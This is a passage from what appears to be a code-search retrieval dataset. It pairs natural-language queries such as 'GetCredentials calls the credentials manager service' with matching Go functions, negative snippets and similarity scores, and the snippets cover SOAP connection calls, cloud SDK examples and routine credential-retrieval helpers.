{\n\t\tNewConnectionType string\n\t\tNewPossibleConnectionTypes string\n\t}{}\n\n\t// Perform the SOAP call.\n\tif err = client.SOAPClient.PerformActionCtx(ctx, URN_WANPPPConnection_1, \"GetConnectionTypeInfo\", request, response); err != nil {\n\t\treturn\n\t}\n\n\t// BEGIN Unmarshal arguments from response.\n\n\tif NewConnectionType, err = soap.UnmarshalString(response.NewConnectionType); err != nil {\n\t\treturn\n\t}\n\tif NewPossibleConnectionTypes, err = soap.UnmarshalString(response.NewPossibleConnectionTypes); err != nil {\n\t\treturn\n\t}\n\t// END Unmarshal arguments from response.\n\treturn\n}", "func GetConnection(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *ConnectionState, opts ...pulumi.ResourceOption) (*Connection, error) {\n\tvar resource Connection\n\terr := ctx.ReadResource(\"gcp:bigquery/connection:Connection\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (mg *Address) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func NewGetPublishConnectionDetailsTo(receiver, runtime string) New {\n\treturn func(f *jen.File, o types.Object) {\n\t\tf.Commentf(\"GetPublishConnectionDetailsTo of this %s.\", o.Name())\n\t\tf.Func().Params(jen.Id(receiver).Op(\"*\").Id(o.Name())).Id(\"GetPublishConnectionDetailsTo\").Params().Op(\"*\").Qual(runtime, \"PublishConnectionDetailsTo\").Block(\n\t\t\tjen.Return(jen.Id(receiver).Dot(fields.NameSpec).Dot(\"PublishConnectionDetailsTo\")),\n\t\t)\n\t}\n}", "func (client *WANIPConnection1) GetConnectionTypeInfo() (NewConnectionType string, NewPossibleConnectionTypes string, err error) {\n\treturn client.GetConnectionTypeInfoCtx(context.Background())\n}", "func ExampleTimeSeriesDatabaseConnectionsClient_Get() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armdigitaltwins.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewTimeSeriesDatabaseConnectionsClient().Get(ctx, \"resRg\", \"myDigitalTwinsService\", \"myConnection\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.TimeSeriesDatabaseConnection = armdigitaltwins.TimeSeriesDatabaseConnection{\n\t// \tName: to.Ptr(\"myConnection\"),\n\t// \tType: to.Ptr(\"Microsoft.DigitalTwins/digitalTwinsInstances/timeSeriesDatabaseConnections\"),\n\t// \tID: to.Ptr(\"/subscriptions/50016170-c839-41ba-a724-51e9df440b9e/resourcegroups/resRg/providers/Microsoft.DigitalTwins/digitalTwinsInstances/myDigitalTwinsService/timeSeriesDatabaseConnections/myConnection\"),\n\t// \tProperties: &armdigitaltwins.AzureDataExplorerConnectionProperties{\n\t// \t\tConnectionType: to.Ptr(armdigitaltwins.ConnectionTypeAzureDataExplorer),\n\t// \t\tProvisioningState: to.Ptr(armdigitaltwins.TimeSeriesDatabaseConnectionStateSucceeded),\n\t// \t\tAdxDatabaseName: to.Ptr(\"myDatabase\"),\n\t// \t\tAdxEndpointURI: to.Ptr(\"https://mycluster.kusto.windows.net\"),\n\t// \t\tAdxResourceID: to.Ptr(\"/subscriptions/c493073e-2460-45ba-a403-f3e0df1e9feg/resourceGroups/testrg/providers/Microsoft.Kusto/clusters/mycluster\"),\n\t// \t\tAdxTableName: to.Ptr(\"myTable\"),\n\t// \t\tEventHubConsumerGroup: to.Ptr(\"$Default\"),\n\t// \t\tEventHubEndpointURI: to.Ptr(\"sb://myeh.servicebus.windows.net/\"),\n\t// \t\tEventHubEntityPath: to.Ptr(\"myeh\"),\n\t// \t\tEventHubNamespaceResourceID: to.Ptr(\"/subscriptions/c493073e-2460-45ba-a403-f3e0df1e9feg/resourceGroups/testrg/providers/Microsoft.EventHub/namespaces/myeh\"),\n\t// \t},\n\t// }\n}", "func (m *VpnConfiguration) GetConnectionName()(*string) {\n val, err := m.GetBackingStore().Get(\"connectionName\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func (t *TMDB) CollectionDetails(id int64, params ...option) (*CollectionDetails, error) {\n\tc := new(CollectionDetails)\n\tif err := t.get(c, fmt.Sprintf(\"/3/collection/%d\", id), url.Values{}, params...); err != nil {\n\t\treturn nil, err\n\t}\n\treturn c, nil\n}", "func GetDetails(w http.ResponseWriter, r *http.Request) {\n\tvar ac Account\n\taccountName := r.URL.Query().Get(\"name\")\n\t(&ac).GetAccount(accountName)\n\tres, _ := json.Marshal(ac)\n\tfmt.Fprintf(w, string(res))\n}", "func (mg *RolePolicyAttachment) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (ci ConnectionInfo) AsBasicConnectionInfo() (BasicConnectionInfo, bool) {\n\treturn &ci, true\n}", "func EnvDetails(envID string) (*model.Response, error) {\n\turl := helpers.BuildURL(connectionString(), \"environments\", envID)\n\treturn client.Get(url)\n}", "func (f *IBMPICloudConnectionClient) Get(pclouddef *p_cloud_cloud_connections.PcloudCloudconnectionsGetParams) (*models.CloudConnection, error) {\n\n\tparams := p_cloud_cloud_connections.NewPcloudCloudconnectionsGetParams().WithCloudInstanceID(pclouddef.CloudInstanceID).WithCloudConnectionID(pclouddef.CloudConnectionID)\n\tresp, err := f.session.Power.PCloudCloudConnections.PcloudCloudconnectionsGet(params, ibmpisession.NewAuth(f.session, pclouddef.CloudInstanceID))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"Failed to get cloud connection %s\", err)\n\t}\n\treturn resp.Payload, nil\n}", "func (b *Bucket) DBInfo(ctx context.Context) (info db.Info, cc db.CollectionConfig, err error) {\n\tctx, err = b.Context(ctx)\n\tif err != nil {\n\t\treturn\n\t}\n\tid, err := b.Thread()\n\tif err != nil {\n\t\treturn\n\t}\n\tinfo, err = b.clients.Threads.GetDBInfo(ctx, id)\n\tif err != nil {\n\t\treturn\n\t}\n\tcc, err = b.clients.Threads.GetCollectionInfo(ctx, id, buckets.CollectionName)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn info, cc, nil\n}", "func (l *Libvirt) ConnectGetSysinfo(Flags uint32) (rSysinfo string, err error) {\n\tvar buf []byte\n\n\targs := ConnectGetSysinfoArgs {\n\t\tFlags: Flags,\n\t}\n\n\tbuf, err = encode(&args)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tvar r response\n\tr, err = l.requestStream(203, constants.Program, buf, nil, nil)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t// Return value unmarshaling\n\ttpd := typedParamDecoder{}\n\tct := map[string]xdr.TypeDecoder{\"libvirt.TypedParam\": tpd}\n\trdr := bytes.NewReader(r.Payload)\n\tdec := xdr.NewDecoderCustomTypes(rdr, 0, ct)\n\t// Sysinfo: string\n\t_, err = dec.Decode(&rSysinfo)\n\tif err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func (o *OCMProvider) GetConnection() *ocm.Connection {\n\treturn o.conn\n}", "func (t *MedLabPharmaChaincode) GetContainerDetails(stub shim.ChaincodeStubInterface, container_id string) ([]byte, error) {\n\tfmt.Println(\"runnin GetContainerDetails \")\n\tvar key, jsonResp string\n\tvar err error\n\n\tif container_id == \"\" {\n\t\treturn nil, errors.New(\"Incorrect number of arguments. Expecting name of the key to query\")\n\t}\n\n\tfmt.Println(\"key:\" + container_id)\n\tvalAsbytes, err := stub.GetState(container_id)\n\tfmt.Println(valAsbytes)\n\tif err != nil {\n\t\tjsonResp = \"{\\\"Error\\\":\\\"Failed to get state for \" + key + \"\\\"}\"\n\t\treturn nil, errors.New(jsonResp)\n\t}\n\n\treturn valAsbytes, nil\n}", "func dialMetainfoDB(ctx context.Context, project *Project) (_ *metaclient.DB, err error) {\n\treturn project.dialMetainfoDB(ctx)\n}", "func Details(configFlags *genericclioptions.ConfigFlags, args []string) error {\n\tclientcfg := configFlags.ToRawKubeConfigLoader()\n\tcfg, err := clientcfg.RawConfig()\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Can't assemble raw config\")\n\t}\n\tif len(args) < 1 {\n\t\treturn errors.New(\"need a cluster to operate on, please provide the cluster name\")\n\t}\n\tclusterID := args[0]\n\tcluster := cfg.Clusters[clusterID]\n\tif cluster == nil {\n\t\treturn errors.New(fmt.Sprintf(\"cluster %q not found in kubeconfig\", clusterID))\n\t}\n\n\tfmt.Printf(\"API server endpoint: %v\\n\", cluster.Server)\n\tcontext := contextOf(cfg, clusterID)\n\tcoreres, err := coreResDetails(cfg, context)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"\\n%v\\n\", coreres)\n\treturn nil\n}", "func (mg *UserPolicyAttachment) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}" ]
[ "0.7811777", "0.64218867", "0.6247037", "0.6234979", "0.6198452", "0.61878574", "0.61641467", "0.61612487", "0.6139142", "0.61310023", "0.60981506", "0.6091691", "0.6087747", "0.59778386", "0.5948832", "0.5941653", "0.58762443", "0.57883453", "0.573324", "0.56949484", "0.566347", "0.56435907", "0.5643346", "0.5630021", "0.56179786", "0.5545095", "0.5426052", "0.5418313", "0.53810626", "0.53621686", "0.534958", "0.5319464", "0.5313756", "0.53010774", "0.5292344", "0.52831155", "0.52607065", "0.5251149", "0.522812", "0.5211654", "0.5154901", "0.5151801", "0.51489586", "0.5144176", "0.51399356", "0.5124792", "0.51205873", "0.51125497", "0.50904024", "0.5086176", "0.5070041", "0.50587964", "0.5058542", "0.5057715", "0.50537443", "0.503418", "0.50331044", "0.5028188", "0.5027855", "0.5016949", "0.4985442", "0.4966095", "0.4955507", "0.49530035", "0.4949982", "0.49343368", "0.493427", "0.49273303", "0.49192384", "0.49156246", "0.4911491", "0.490869", "0.4904012", "0.48856938", "0.48702142", "0.48656943", "0.4857278", "0.48571545", "0.48534092", "0.48502052", "0.48428768", "0.484146", "0.4833811", "0.47966498", "0.47870123", "0.47842866", "0.47805634", "0.47728044", "0.47703245", "0.4767", "0.47654986", "0.47557682", "0.47554624", "0.47499818", "0.47464734", "0.47429815", "0.47369614", "0.47238553", "0.47221488", "0.4710382" ]
0.77983415
1
GetCredentials calls the credentials manager service
func GetCredentials(datasetID string, req *modules.DataInfo, input *app.M4DApplication) error { // Set up a connection to the data catalog interface server. conn, err := grpc.Dial(utils.GetCredentialsManagerServiceAddress(), grpc.WithInsecure(), grpc.WithBlock()) if err != nil { return err } defer conn.Close() c := dc.NewDataCredentialServiceClient(conn) // Contact the server and print out its response. ctx, cancel := context.WithTimeout(context.Background(), time.Minute) defer cancel() dataCredentials, err := c.GetCredentialsInfo(ctx, &dc.DatasetCredentialsRequest{ DatasetId: datasetID, AppId: utils.CreateAppIdentifier(input)}) if err != nil { return err } req.Credentials = dataCredentials.DeepCopy() return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func GetCredentials(parameters *ClientParameters) *Credentials {\n\treturn getCredentials(parameters)\n}", "func (m *Manager) GetCredentials() map[string]interface{} {\n\treturn map[string]interface{}{\"user\": m.user.User, \"pass\": m.user.Pass}\n}", "func GetCredentials(req *modules.DataInfo, input *app.M4DApplication) error {\n\t// Set up a connection to the data catalog interface server.\n\tconn, err := grpc.Dial(utils.GetCredentialsManagerServiceAddress(), grpc.WithInsecure(), grpc.WithBlock())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tc := dc.NewDataCredentialServiceClient(conn)\n\n\t// Contact the server and print out its response.\n\tctx, cancel := context.WithTimeout(context.Background(), time.Minute)\n\tdefer cancel()\n\n\tdataCredentials, err := c.GetCredentialsInfo(ctx, &dc.DatasetCredentialsRequest{\n\t\tDatasetId: req.Context.DataSetID,\n\t\tAppId: utils.CreateAppIdentifier(input)})\n\tif err != nil {\n\t\treturn err\n\t}\n\treq.Credentials = dataCredentials\n\n\treturn nil\n}", "func (c *Client) GetCredentials(ctx context.Context, params *GetCredentialsInput, optFns ...func(*Options)) (*GetCredentialsOutput, error) {\n\tif params == nil {\n\t\tparams = &GetCredentialsInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"GetCredentials\", params, optFns, c.addOperationGetCredentialsMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*GetCredentialsOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func (c *Client) GetCredentials(host string) (*Credentials, error) {\n\tvar stdout bytes.Buffer\n\n\tvar stderr bytes.Buffer\n\n\t// TODO: handle session expired error\n\tcmd := exec.Command(\"op\", \"--cache\", \"--session\", c.token, \"get\", \"item\", host) // nolint:gosec // TODO: validate\n\tcmd.Stdout = &stdout\n\tcmd.Stderr = &stderr\n\n\tif err := cmd.Run(); err != nil {\n\t\treturn nil, errors.New(stderr.String()) // nolint:goerr113 // TODO: refactor\n\t}\n\n\tvar res response\n\tif err := json.Unmarshal(stdout.Bytes(), &res); err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar username string\n\n\tvar password string\n\n\tfor _, field := range res.Details.Fields {\n\t\tif field.Name == \"username\" {\n\t\t\tusername = field.Value\n\t\t}\n\n\t\tif field.Name == \"password\" {\n\t\t\tpassword = field.Value\n\t\t}\n\t}\n\n\treturn &Credentials{\n\t\tUsername: username,\n\t\tPassword: password,\n\t}, nil\n}", "func (doWebAuthn WebAuthn) GetCredentials(authenticatorID webauthn.AuthenticatorID) (retCredentials []*webauthn.Credential, err error) {\n\tb := webauthn.GetCredentials(authenticatorID)\n\treturn b.Do(doWebAuthn.ctxWithExecutor)\n}", "func GetCredentials(env string) (credentials.Credential, error) {\n\t// get tokens or login\n\tstore, err := credentials.GetDefaultCredentialStore()\n\tif err != nil {\n\t\treturn credentials.Credential{}, err\n\t}\n\n\tif !utils.APIMExistsInEnv(env, utils.MainConfigFilePath) {\n\t\tfmt.Println(\"APIM does not exists in\", env, \"Add it using add env\")\n\t\tos.Exit(1)\n\t}\n\n\t// check for creds\n\tif !store.HasAPIM(env) {\n\t\tfmt.Println(\"Login to APIM in\", env)\n\t\terr = runLogin(store, env, \"\", \"\")\n\t\tif err != nil {\n\t\t\treturn credentials.Credential{}, err\n\t\t}\n\t\tfmt.Println()\n\t}\n\tcred, err := store.GetAPIMCredentials(env)\n\tif err != nil {\n\t\treturn credentials.Credential{}, err\n\t}\n\treturn cred, nil\n}", "func (o *Command) GetCredentials(rw io.Writer, req io.Reader) command.Error {\n\tvcRecords, err := o.verifiableStore.GetCredentials()\n\tif err != nil {\n\t\tlogutil.LogError(logger, CommandName, GetCredentialsCommandMethod, \"get credential records : \"+err.Error())\n\n\t\treturn command.NewValidationError(GetCredentialsErrorCode, fmt.Errorf(\"get credential records : %w\", err))\n\t}\n\n\tcommand.WriteNillableResponse(rw, &RecordResult{\n\t\tResult: vcRecords,\n\t}, logger)\n\n\tlogutil.LogDebug(logger, CommandName, GetCredentialsCommandMethod, \"success\")\n\n\treturn nil\n}", "func Get(program ProgramFunc, serverURL string) (*credentials.Credentials, error) {\n\tcmd := program(\"get\")\n\tcmd.Input(strings.NewReader(serverURL))\n\n\tout, err := cmd.Output()\n\tif err != nil {\n\t\tt := strings.TrimSpace(string(out))\n\n\t\tif credentials.IsErrCredentialsNotFoundMessage(t) {\n\t\t\treturn nil, credentials.NewErrCredentialsNotFound()\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"error getting credentials - err: %v, out: `%s`\", err, t)\n\t}\n\n\tresp := &credentials.Credentials{\n\t\tServerURL: serverURL,\n\t}\n\n\tif err := json.NewDecoder(bytes.NewReader(out)).Decode(resp); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp, nil\n}", "func (c *WebAuthn) GetCredentials(authenticatorId string) ([]*WebAuthnCredential, error) {\n\tvar v WebAuthnGetCredentialsParams\n\tv.AuthenticatorId = authenticatorId\n\treturn c.GetCredentialsWithParams(&v)\n}", "func (w *ServerInterfaceWrapper) GetCredentials(ctx echo.Context) error {\n\tvar err error\n\t// ------------- Path parameter \"id\" -------------\n\tvar id int\n\n\terr = runtime.BindStyledParameter(\"simple\", false, \"id\", ctx.Param(\"id\"), &id)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, fmt.Sprintf(\"Invalid format for parameter id: %s\", err))\n\t}\n\n\tctx.Set(\"OAuth.Scopes\", []string{\"\"})\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.GetCredentials(ctx, id)\n\treturn err\n}", "func (om *Sdk) GetCredentials(name, credential string) (*SimpleCredential, error) {\n\tproductGUID, err := om.productGUIDByType(name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tout, err := om.api.GetDeployedProductCredential(api.GetDeployedProductCredentialInput{\n\t\tDeployedGUID: productGUID,\n\t\tCredentialReference: credential,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &SimpleCredential{\n\t\tIdentity: out.Credential.Value[\"identity\"],\n\t\tPassword: out.Credential.Value[\"password\"],\n\t}, nil\n}", "func GetCredentials(isExternal bool) *credentials.Credentials {\n\tmu.Lock()\n\tif credentialChain == nil {\n\t\tcredProviders := defaults.CredProviders(defaults.Config(), defaults.Handlers())\n\t\tcredProviders = append(credProviders, providers.NewRotatingSharedCredentialsProvider())\n\t\tcredentialChain = credentials.NewCredentials(&credentials.ChainProvider{\n\t\t\tVerboseErrors: false,\n\t\t\tProviders: credProviders,\n\t\t})\n\t}\n\tmu.Unlock()\n\n\t// credentials.Credentials is concurrency-safe, so lock not needed here\n\tv, err := credentialChain.Get()\n\tif err != nil {\n\t\tseelog.Errorf(\"Error getting ECS instance credentials from default chain: %s\", err)\n\t} else {\n\t\tseelog.Infof(\"Successfully got ECS instance credentials from provider: %s\", v.ProviderName)\n\t}\n\treturn credentialChain\n}", "func (handler *Handler) GetCredentials(ctx context.Context, _ *sync.WaitGroup, startupTimer startup.Timer,\n\tdic *di.Container) bool {\n\tlc := bootstrapContainer.LoggingClientFrom(dic.Get)\n\tconfig := container.ConfigurationFrom(dic.Get)\n\tsecretProvider := bootstrapContainer.SecretProviderFrom(dic.Get)\n\n\tvar credentials *bootstrapConfig.Credentials\n\n\tfor startupTimer.HasNotElapsed() {\n\t\t// retrieve mosquitto credentials from secretstore\n\t\tsecrets, err := secretProvider.GetSecret(config.SecureMosquitto.SecretName)\n\t\tif err == nil {\n\t\t\tcredentials = &bootstrapConfig.Credentials{\n\t\t\t\tUsername: secrets[secret.UsernameKey],\n\t\t\t\tPassword: secrets[secret.PasswordKey],\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\n\t\tlc.Warnf(\"Could not retrieve mosquitto credentials (startup timer has not expired): %s\", err.Error())\n\t\tstartupTimer.SleepForInterval()\n\t}\n\n\tif credentials == nil {\n\t\tlc.Error(\"Failed to retrieve mosquitto credentials before startup timer expired\")\n\t\treturn false\n\t}\n\n\thandler.credentials = *credentials\n\treturn true\n}", "func (l *DatabaseCrendentialBackend) GetCredentials(clusterId string) (*m.ClusterCredentials, error) {\n\tcredentials := sqlstore.GetCredentials(clusterId)\n\treturn credentials, nil\n}", "func RetrieveCreds(accessKey, secretKey, sessionToken string, logger logr.Logger) (*credentials.Credentials, error) {\n\tcredConfig := &CredentialsConfig{\n\t\tAccessKey: accessKey,\n\t\tSecretKey: secretKey,\n\t\tSessionToken: sessionToken,\n\t\tlog: logger,\n\t}\n\tcreds, err := credConfig.GenerateCredentialChain()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif creds == nil {\n\t\treturn nil, fmt.Errorf(\"could not compile valid credential providers from static config, environment, shared, or instance metadata\")\n\t}\n\n\t_, err = creds.Get()\n\tif err != nil {\n\t\treturn nil, errwrap.Wrapf(\"failed to retrieve credentials from credential chain: {{err}}\", err)\n\t}\n\treturn creds, nil\n}", "func (mds *metadataService) getCredentials(w http.ResponseWriter, r *http.Request) {\n\tcreds, err := mds.creds.GetCredentials()\n\tif err != nil {\n\t\tw.WriteHeader(500)\n\t\tfmt.Fprint(w, err.Error())\n\t\treturn\n\t}\n\n\tresp := &securityCredentialsResponse{\n\t\tCode: \"Success\",\n\t\tLastUpdated: time.Now().UTC().Format(time.RFC3339),\n\t\tType: \"AWS-HMAC\",\n\t\tAccessKeyId: *creds.AccessKeyId,\n\t\tSecretAccessKey: *creds.SecretAccessKey,\n\t\tToken: *creds.SessionToken,\n\t\tExpiration: creds.Expiration.UTC().Format(time.RFC3339),\n\t}\n\trespBody, err := json.Marshal(resp)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tw.Write(respBody)\n}", "func (o *Service) GetCredentials() map[string]map[string]bool {\n\tif o == nil || o.Credentials == nil {\n\t\tvar ret map[string]map[string]bool\n\t\treturn ret\n\t}\n\treturn *o.Credentials\n}", "func (k *Kluster) GetCredentials() ([]string, error) {\n\tcredentials, err := k.loadCredentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// k.ui.Log.Debugf(\"credentials load from environment for platform %s. (%v)\", credentials.platform(), credentials.parameters())\n\t// assign the credentials to the cluster provisioner\n\tparams := credentials.parameters()\n\t// k.Credentials(params...)\n\n\treturn params, nil\n}", "func GetCredentials(ctx context.Context) *CredentialsCookie {\n\tcreds, _ := ctx.Value(\"creds\").(*CredentialsCookie)\n\treturn creds\n}", "func (l *FixtureCredentialBackend) GetCredentials(clusterId string) (*m.ClusterCredentials, error) {\n\tresult := l.credentials[clusterId]\n\tif result == nil {\n\t\treturn nil, fmt.Errorf(\"credentials not found for %s\", clusterId)\n\t}\n\treturn result, nil\n}", "func (m *DeviceLocalCredentialInfo) GetCredentials()([]DeviceLocalCredentialable) {\n val, err := m.GetBackingStore().Get(\"credentials\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.([]DeviceLocalCredentialable)\n }\n return nil\n}", "func (dsc *DataSourceConfig) GetCredentials() *Credentials {\n\tif num := len(dsc.creds); num > 0 {\n\t\tvar creds []*Credentials\n\t\tfor _, c := range dsc.creds {\n\t\t\tcreds = append(creds, c)\n\t\t}\n\t\treturn creds[rand.Intn(num)]\n\t}\n\treturn nil\n}", "func (b *Base) GetCredentials(ctx context.Context) (*Credentials, error) {\n\tvalue := ctx.Value(contextCredentialsFlag)\n\tif value != nil {\n\t\tctxCredStore, ok := value.(*contextCredentialsStore)\n\t\tif !ok {\n\t\t\treturn &Credentials{}, errContextCredentialsFailure\n\t\t}\n\n\t\tcreds := ctxCredStore.Get()\n\t\tif err := b.CheckCredentials(creds, true); err != nil {\n\t\t\treturn creds, fmt.Errorf(\"context credentials issue: %w\", err)\n\t\t}\n\t\treturn creds, nil\n\t}\n\n\terr := b.CheckCredentials(b.API.credentials, false)\n\tif err != nil {\n\t\treturn &Credentials{}, err\n\t}\n\tsubAccountOverride, ok := ctx.Value(contextSubAccountFlag).(string)\n\tb.API.credMu.RLock()\n\tdefer b.API.credMu.RUnlock()\n\tcreds := *b.API.credentials\n\tif ok {\n\t\tcreds.SubAccount = subAccountOverride\n\t}\n\treturn &creds, nil\n}", "func GetCredential(c *Credentials) error {\n\trow, cancel, err := db.ConnManager.QueryRow(sqlCredentialsGet, c.Id)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer cancel()\n\tc.Site = &sites.Site{}\n\tif err := row.Scan(&c.Id, &c.Login, &c.Password, &c.Site.Id, &c.Site.Name, &c.Site.Host); err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ErrCredentialsNotFound\n\t\t}\n\t\treturn err\n\t}\n\treturn nil\n}", "func (a *Client) V2GetCredentials(ctx context.Context, params *V2GetCredentialsParams) (*V2GetCredentialsOK, error) {\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"V2GetCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v2/clusters/{cluster_id}/credentials\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\", \"https\"},\n\t\tParams: params,\n\t\tReader: &V2GetCredentialsReader{formats: a.formats},\n\t\tAuthInfo: a.authInfo,\n\t\tContext: ctx,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*V2GetCredentialsOK), nil\n\n}", "func (p *credentialProvider) Retrieve() (aws.Credentials, error) {\n\tawscred := aws.Credentials{\n\t\tSecretAccessKey: p.SecretAccessKey,\n\t\tAccessKeyID: p.AccessKeyID,\n\t}\n\n\treturn awscred, nil\n}", "func (c *contextCredentialsStore) Get() *Credentials {\n\tc.mu.RLock()\n\tcreds := *c.creds\n\tc.mu.RUnlock()\n\treturn &creds\n}", "func (c *ContextCredentialsStore) Get() *Credentials {\n\tc.mu.RLock()\n\tcreds := *c.creds\n\tc.mu.RUnlock()\n\treturn &creds\n}", "func NewCredentialsProvider(\n\tgetCredentials CredentialsCallback,\n\tverifyCredentials VerifyCredentialsCallback,\n\tchooseCredentialHelper ChooseCredentialHelperCallback) CredentialsProvider {\n\n\tif verifyCredentials == nil {\n\t\tverifyCredentials = CheckAuth\n\t}\n\n\tif chooseCredentialHelper == nil {\n\t\tchooseCredentialHelper = func(available []string) (string, error) {\n\t\t\treturn \"\", nil\n\t\t}\n\t}\n\n\tauthFilePath := filepath.Join(fn.ConfigPath(), \"auth.json\")\n\tsys := &containersTypes.SystemContext{\n\t\tAuthFilePath: authFilePath,\n\t}\n\n\thome, err := os.UserHomeDir()\n\tif err != nil {\n\t\tpanic(err)\n\t\t//return result, fmt.Errorf(\"failed to determine home directory: %w\", err)\n\t}\n\tdockerConfigPath := filepath.Join(home, \".docker\", \"config.json\")\n\n\treturn func(ctx context.Context, registry string) (Credentials, error) {\n\t\tresult := Credentials{}\n\n\t\tfor _, load := range []func() (containersTypes.DockerAuthConfig, error){\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn config.GetCredentials(sys, registry)\n\t\t\t},\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn getCredentialsByCredentialHelper(authFilePath, registry)\n\t\t\t},\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn getCredentialsByCredentialHelper(dockerConfigPath, registry)\n\t\t\t},\n\t\t} {\n\t\t\tvar credentials containersTypes.DockerAuthConfig\n\t\t\tcredentials, err = load()\n\n\t\t\tif err != nil && !errors.Is(err, errCredentialsNotFound) {\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\n\t\t\tif credentials != (containersTypes.DockerAuthConfig{}) {\n\t\t\t\tresult.Username, result.Password = credentials.Username, credentials.Password\n\n\t\t\t\terr = verifyCredentials(ctx, result.Username, result.Password, registry)\n\t\t\t\tif err == nil {\n\t\t\t\t\treturn result, nil\n\t\t\t\t} else {\n\t\t\t\t\tif !errors.Is(err, ErrUnauthorized) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tfor {\n\t\t\tresult, err = getCredentials(registry)\n\t\t\tif err != nil {\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\n\t\t\terr = verifyCredentials(ctx, result.Username, result.Password, registry)\n\t\t\tif err == nil {\n\t\t\t\terr = setCredentialsByCredentialHelper(authFilePath, registry, result.Username, result.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tif !errors.Is(err, errNoCredentialHelperConfigured) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t\thelpers := listCredentialHelpers()\n\t\t\t\t\thelper, err := chooseCredentialHelper(helpers)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t\thelper = strings.TrimPrefix(helper, \"docker-credential-\")\n\t\t\t\t\terr = setCredentialHelperToConfig(authFilePath, helper)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn Credentials{}, fmt.Errorf(\"faild to set the helper to the config: %w\", err)\n\t\t\t\t\t}\n\t\t\t\t\terr = setCredentialsByCredentialHelper(authFilePath, registry, result.Username, result.Password)\n\t\t\t\t\tif err != nil && !errors.Is(err, errNoCredentialHelperConfigured) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn result, nil\n\t\t\t} else {\n\t\t\t\tif errors.Is(err, ErrUnauthorized) {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\t\t}\n\t}\n}", "func credentials() *centrifuge.Credentials {\n\t// Never show secret to client of your application. Keep it on your application backend only.\n\tsecret := \"secret\"\n\t// Application user ID.\n\tuser := \"42\"\n\t// Current timestamp as string.\n\ttimestamp := centrifuge.Timestamp()\n\t// Empty info.\n\tinfo := \"\"\n\t// Generate client token so Centrifugo server can trust connection parameters received from client.\n\ttoken := auth.GenerateClientToken(secret, user, timestamp, info)\n\n\treturn &centrifuge.Credentials{\n\t\tUser: user,\n\t\tTimestamp: timestamp,\n\t\tInfo: 